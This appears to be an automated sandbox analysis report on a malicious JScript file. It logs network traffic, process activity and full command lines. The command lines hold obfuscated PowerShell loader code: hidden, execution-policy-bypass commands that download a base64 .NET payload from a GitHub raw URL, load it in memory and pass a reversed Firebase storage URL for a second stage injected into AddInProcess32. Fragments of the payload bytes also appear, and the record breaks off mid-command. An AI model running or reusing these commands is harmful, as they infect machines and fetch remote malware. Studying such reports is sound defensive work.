                                                                        2024-10-07 15:09:07 UTC1369INData Raw: 76 61 72 31 32 34 36 20 3d 20 22 74 65 78 74 6f 31 32 34 35 22 0d 0a 76 61 72 31 32 34 37 20 3d 20 22 74 65 78 74 6f 31 32 34 36 22 0d 0a 76 61 72 31 32 34 38 20 3d 20 22 74 65 78 74 6f 31 32 34 37 22 0d 0a 76 61 72 31 32 34 39 20 3d 20 22 74 65 78 74 6f 31 32 34 38 22 0d 0a 0d 0a 76 61 72 31 32 35 30 20 3d 20 22 74 65 78 74 6f 31 32 34 39 22 0d 0a 76 61 72 31 32 35 31 20 3d 20 22 74 65 78 74 6f 31 32 35 30 22 0d 0a 76 61 72 31 32 35 32 20 3d 20 22 74 65 78 74 6f 31 32 35 31 22 0d 0a 76 61 72 31 32 35 33 20 3d 20 22 74 65 78 74 6f 31 32 35 32 22 0d 0a 76 61 72 31 32 35 34 20 3d 20 22 74 65 78 74 6f 31 32 35 33 22 0d 0a 76 61 72 31 32 35 35 20 3d 20 22 74 65 78 74 6f 31 32 35 34 22 0d 0a 76 61 72 31 32 35 36 20 3d 20 22 74 65 78 74 6f 31 32 35 35 22 0d 0a
                                                                        Data Ascii: var1246 = "texto1245"var1247 = "texto1246"var1248 = "texto1247"var1249 = "texto1248"var1250 = "texto1249"var1251 = "texto1250"var1252 = "texto1251"var1253 = "texto1252"var1254 = "texto1253"var1255 = "texto1254"var1256 = "texto1255"


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.749709185.199.110.1334437176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-07 15:09:15 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
                                                                        2024-10-07 15:09:15 UTC904INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 2935468
                                                                        Cache-Control: max-age=300
                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: deny
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-GitHub-Request-Id: 33D1:A1DE:104DADA:11B62C5:6703F99A
                                                                        Accept-Ranges: bytes
                                                                        Date: Mon, 07 Oct 2024 15:09:15 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-ewr-kewr1740027-EWR
                                                                        X-Cache: MISS
                                                                        X-Cache-Hits: 0
                                                                        X-Timer: S1728313756.815684,VS0,VE136
                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        X-Fastly-Request-ID: 742723ba9bdd6294885a453159d5bb16485cc5df
                                                                        Expires: Mon, 07 Oct 2024 15:14:15 GMT
                                                                        Source-Age: 0
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                        Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                        Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                        Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                        Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                        Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                        2024-10-07 15:09:15 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                        Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                        2024-10-07 15:09:16 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                        Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                        2024-10-07 15:09:16 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                        Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                        2024-10-07 15:09:16 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                        Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:11:09:03
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js"
                                                                        Imagebase:0x7ff629140000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:11:09:06
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGwAQQBjAGUAIAAgACgAWwBDAGgAYQBSAF0ANgA2ACsAWwBDAGgAYQBSAF0ANAA4ACsAWwBDAGgAYQBSAF0ANQA2ACkALABbAEMAaABhAFIAXQAzADYAIAAgAC0AUgBlAFAAbABBAGMAZQAgACAAKABbAEMAaABhAFIAXQA4ADQAKwBbAEMAaABhAFIAXQA1ADIAKwBbAEMAaABhAFIAXQAxADIAMQApACwAWwBDAGgAYQBSAF0AOQAyACkAfAAuACgAIAAoAFsAcwBUAFIAaQBuAEcAXQAkAFYAZQBSAEIAbwBTAGUAcAByAGUARgBlAHIARQBOAGMAZQApAFsAMQAsADMAXQArACcAWAAnAC0ASgBPAGkAbgAnACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                        Imagebase:0x7ff741d30000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:11:09:06
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff75da10000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:11
                                                                        Start time:11:09:12
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce 